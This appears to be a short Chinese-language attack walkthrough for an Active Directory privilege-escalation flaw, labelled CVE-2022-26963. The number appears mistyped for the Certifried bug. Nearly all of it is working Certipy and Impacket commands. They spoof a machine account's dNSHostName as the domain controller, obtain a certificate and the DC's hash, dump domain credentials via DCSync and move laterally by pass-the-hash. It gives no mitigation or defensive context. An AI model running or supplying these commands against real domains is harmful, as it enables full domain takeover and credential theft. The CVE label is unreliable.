CVE-2022-26963AD域权限提升

目录

• 攻击

受影响的 Windows 版本：

Windows 8.1

Windows 10 Version 1607, 1809,1909, 2004, 20H2, 21H1, 21H2

Windows 11

Windows Server 2008，2012，2016，2019，2022

由于计算机账户中的dNSHostName不具有唯一性，可以对其进行伪造，冒充高权限的域空机器账户，实现权限提升的效果

漏洞利用条件：

1. 能够创建机器账户（或拥有某机器账户的控制权）
2. 对机器账户具有修改属性的权限
3. 目标未打相应补丁

攻击

https://github.com/ly4k/Certipy

添加一个机器账户，并设置其dnshostname改为与dc相同

certipy account create chinfo.testlab/test1:'Syclover!'@DC.chinfo.testlab -user "hacker" -dns "DC.chinfo.testlab"
如果报错就换种写法
certipy account create -u gasstest2@a.com.cn -p 'asdnsad' -user 'aa' -dns 'DC1$' -dc-ip 192.168.1.1

获取机器账户的machine证书

certipy req chinfo.testlab/'hacker$:Qv8A7bBHFtwpPhRj'@DC.chinfo.testlab -ca chinfo-DC-CA -template Machine

获得机器账户的hash

certipy auth -pfx dc.pfx

此时获得的hash是dc机器用户的hash，这个hash不能直接拿来登录，但是可以拿来dcsync获取hash

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py 'chinfo.testlab/dc$@dc.chinfo.testlab' -hashes b0d7d9976a8006c910f50030088730f8:b0d7d9976a8006c910f50030088730f8

获取hash后进行横向

python3 /usr/share/doc/python3-impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2fd54b5d964ccb69be6bdb69d76fad65 ADMINISTRATOR@1.1.1.2